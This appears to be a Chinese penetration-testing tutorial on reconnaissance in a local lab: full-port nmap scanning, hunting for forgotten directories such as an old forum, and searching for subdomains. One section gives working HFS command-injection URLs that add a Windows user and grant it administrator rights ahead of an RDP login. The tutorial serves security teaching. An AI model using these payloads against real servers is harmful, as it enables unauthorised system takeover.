二、渗透测试之信息收集

端口扫描渗透

1、安装Zenmap工具,免积分下载地址:https://download.csdn.net/download/songling515010475/12324157

2、为演示效果在phpstudy环境下创建一个新的站点,端口为8080,并在目录下配置一个静态网页或论坛之类的,这里只是为了演示商品扫描,所以放了一个简单的静态网页。

二、渗透测试之信息收集

 二、渗透测试之信息收集

3、打开Zenmap工具

  • 目标:127.0.0.1  //渗透本机搭建的环境
  • 配置:Intense scan, all TCP ports  //这里选择扫描该地址的所有商品(扫描过程时间稍微会长一点)
  • 命令:nmap -p 1-65535 -T4 -A -v 127.0.0.1 //这里就用默认的

二、渗透测试之信息收集

从扫描结果看到我们配置的两个WEB端口都被扫描出来了 ,80和8080,这里假设80是主站,8080是论坛,当我们从主站无从下手时,可以着手从该站点的另一个端口下手,有可能论坛能找到渗透漏洞,这样能增加渗透机率。

 

目录结构渗透分析

二、渗透测试之信息收集

场景:主站(/),新版论坛(/bbs),旧版论坛(/bbs_bak),旧版论坛BUG众多,不便维护的情况下,该站点公司开发出了一个新的论坛,并单独布署到了8080端口,然后把老版本bbs论坛只是简单单的重命名了(bbs_bak)。

分析

假如渗透测试时对该站点主站(80)和新论坛(8080)无从下手,我们可以尝试用工具扫描出该站的结构目录,或者可以手工去尝试访问该站点其它目录。

在上面场景中的 bbs_bak该目录,也有可能是 bbs_old ,bbs_20200413等名字的并非限定为bbs_bak。

旧版论坛假如无人维护,BUG众多等等一些原因,哪么就可以从该站点直接渗透,增渗透机率。

 

WEB域名结构渗透

二、渗透测试之信息收集

  • 通过搜索引擎(baidu,google,bing)搜索子域名,site:163.com 注意,不要前面的www,这种搜索引擎方式自己写一个爬虫全记录下来。

二、渗透测试之信息收集

 

第三方漏洞渗透

创建一个hfs远程文件访问服务器,并通过远程执行命令添加用户,从而达到远程管制的目的

远程添加用户:http://192.168.21.132:8080/?search==%00{.exec|cmd c net user ssss 123456 /add.}

远程提取权:http://192.168.21.132:8080/?search==%00{.exec|cmd /c net localgroup administrators ssss /add.}

再通过3389连接服务器

二、渗透测试之信息收集

二、渗透测试之信息收集

 

中间件平台渗透

像tomcat ,weblogic ,iis 等这些web中间件也存在漏洞,可以通过工具扫描出来,加以利用。